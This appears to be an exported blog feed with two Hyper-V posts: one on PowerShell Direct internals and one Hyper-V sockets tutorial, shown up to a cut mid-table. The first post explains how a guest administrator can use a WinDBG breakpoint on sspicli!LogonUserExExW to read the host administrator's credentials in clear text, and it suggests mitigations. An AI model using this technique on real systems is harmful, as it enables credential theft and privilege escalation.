<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-76486583553595283022017-05-11T10:34:00.003-07:002017-05-11T10:34:45.648-07:00PowerShell Direct (few internals)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-bf50047a-f892-f6d1-0ba8-b9c1aef1103b" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Some thoughts about new Windows Server 2016 and Windows 10 Hyper-V feature – PowerShell Direct. This feature is used for sending commands from host OS to guest OS without network communication. You can read about it on </span><a href="https://blogs.technet.microsoft.com/virtualization/2015/05/14/powershell-direct-running-powershell-inside-a-virtual-machine-from-the-hyper-v-host/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://blogs.technet.microsoft.com/virtualization/2015/05/14/powershell-direct-running-powershell-inside-a-virtual-machine-from-the-hyper-v-host/</span></a></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In host OS you can enter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enter-PSSession </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Invoke-Command </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-ScriptBlock</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { Commands } </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And then you can execute commands in guest OS. Before you can run command, you need enter guest OS credentials with local admin privileges. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="185" src="https://lh6.googleusercontent.com/1S1d9R07hAOa9bjoz4Bzue9RddKTlNSJtJiXYgmCnrRhfDjQtYSHH2WHM3-nC4GYCOz7YkH_lnOgTYGcCFbJmm8H1PicFhFCsmh_BTfozFegwIB--y2Jl8E76jvs1hheDHsFKYF5DrOTEaPZdQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="216" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After you enter it, PowerShell process in host OS send data to guest OS using Hyper-V sockets.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] domain = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.Domain);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] userName = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.UserName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Byte</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[] password = </span><span style="background-color: transparent; color: #2b91af; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Encoding</span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.Unicode.GetBytes(networkCredential.Password);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(domain);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(userName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Send(password);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HyperVSocket.Receive(response);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> In guest OS it handles by icsvc.dll (virtual machine integration component services), which runs as a service.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="265" src="https://lh5.googleusercontent.com/7RtvxrMyHysqiFEqrKqM71oiX45JZBpoM6YbbElWc3kSHh2LFjZL7kmNXPjYe50Yq9gaYwF3nXM-NEMm98O9ufz1tK6ZG97JCZFo5NphsVTlThvmlP3-bGkHTaqwn1CQnpfPB_OSrrJRWE0wFA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="195" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS administrator can attach WinDBG to this instance of svchost.exe and make command </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bp sspicli!LogonUserExExW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">g </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(yes, before it he can enter </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.logopen</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and then go to sleep). After host OS administrator enters guest OS credentials, WinDBG stops on </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">sspicli!LogonUserExExW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and you can see clear text login and password.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img alt="C:\Users\Arthur\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Example.png" height="245" src="https://lh3.googleusercontent.com/-ubvTX54X6QD6xuELasdErXoJyv12TO2CNo2p3xF9CcGul1DhdZaEaXn5pa-LnTNSH3HP5sWMp5vb_3D1NWIuUgTiqpQtXiiCLGcyh1BS1qYM-NFEoHOaGsxPqocsn51S0n6SIFvaXEn0J2hCg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="364" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These credentials are needed for starting powershell.exe process (using CreateProcessAsUserW function). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is not a bug, but, it seems, creates short nuance for enterprise environment - you can’t use PowerShell Direct if guest OS have more than one administrator and that administrator is not Hyper-V admin. He can catch you credentials very easy without needs to brute force it.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So, it not bad scenario attack continuation in VDI and Terminal Services virtual machines environment, where simple user can increase privileges to local admin. You can mitigate risks if you use unique local credentials for every virtual machine. Yes, if you use domain account for PowerShell Direct , don’t forget limit logon machines in account properties.</span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-53339244676000692552017-02-23T06:07:00.003-08:002017-05-31T06:46:17.389-07:00Hyper-V sockets (without internals)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This is small article, which shows how convert simple network socket application to application, which uses Hyper-V socket for communication.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using software</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 as Host;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 as Guest;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Visual Studio 2015 and Windows 10 as development environment.</span></div>
</li>
</ul>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to msdn and read about Hyper-V Sockets (1). Read that you need Windows SDK build 10.0.14393.795 (recently QFE for 10.0.14393.033)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run PowerShell script on Host Server</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HV Socket Application"</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Create a new random GUID and add it to the services list then add the name as a value</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Item</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Path</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices"</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Name</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((</span><span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Guid</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid)</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SetValue(</span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"ElementName"</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Copy GUID to clipboard for later use</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Write-Host</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Service GUID: "</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "droid sans mono"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSChildName </span></div>
<br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Remember GUID</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Google (or wrote) application which works with Hyper-V Sockets. I get example from (2)</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We open project in Visual Studio 2015 and convert it. We see two projects in solution: Client Example and Server Example. For every project we need change Target Platform Version to 10.0.14393.0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh5.googleusercontent.com/o6EIHlZjY98chwIErZSvk8bpoDCYfRA6JsQ5Y737YnK6OijGzMdtJvKI3KFh1j9MLluDhJcGwii5zA79UW0DwSB3stVMps3OzJofMf2IFc39b-_HM_J7DRSX0M2wbPh57YW8Uho2TW0tuv7taw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="331" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSDN article gives GUID definitions</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Description</span></div>
</td></tr>
